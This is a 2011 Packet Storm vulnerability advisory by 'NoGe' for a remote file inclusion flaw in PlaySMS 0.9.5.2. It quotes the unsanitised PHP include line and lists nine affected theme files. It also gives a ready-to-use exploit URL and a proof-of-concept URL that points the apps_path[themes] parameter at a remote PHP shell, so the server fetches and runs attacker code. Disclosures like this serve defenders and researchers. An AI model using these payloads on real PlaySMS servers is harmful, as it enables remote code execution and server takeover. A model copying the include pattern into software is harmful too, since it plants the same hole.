PlaySMS 0.9.5.2 Remote File Inclusion

2011-09-07T00:00:00
ID PACKETSTORM:104838
Type packetstorm
Reporter NoGe
Modified 2011-09-07T00:00:00

Description

                                        
                                            `=============================================================================================================  
  
[o] PlaySMS <= Remote File Inclusion Vulnerability  
  
Software : PlaySMS ver 0.9.5.2  
Vendor : http://playsms.org/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com/  
  
=============================================================================================================  
  
[o] Vulnerability  
  
<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>  
  
affected all this files  
  
web/plugin/themes/default/page_forgot.php  
web/plugin/themes/default/page_login.php  
web/plugin/themes/default/page_noaccess.php  
web/plugin/themes/default/page_register.php  
web/plugin/themes/km2/page_noaccess.php  
web/plugin/themes/work2/page_forgot.php  
web/plugin/themes/work2/page_login.php  
web/plugin/themes/work2/page_noaccess.php  
web/plugin/themes/work2/page_register.php  
  
  
[o] Exploit  
  
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]  
  
  
[o] PoC  
  
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?  
  
=============================================================================================================  
  
[o] Greetz  
  
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory  
aJe kaka11 matthews wishnusakti inc0mp13te martfella  
pizzyroot Genex H312Y noname tukulesto }^-^{  
  
=============================================================================================================  
  
[o] September 05 2011 - Papua, Indonesia  
  
  
`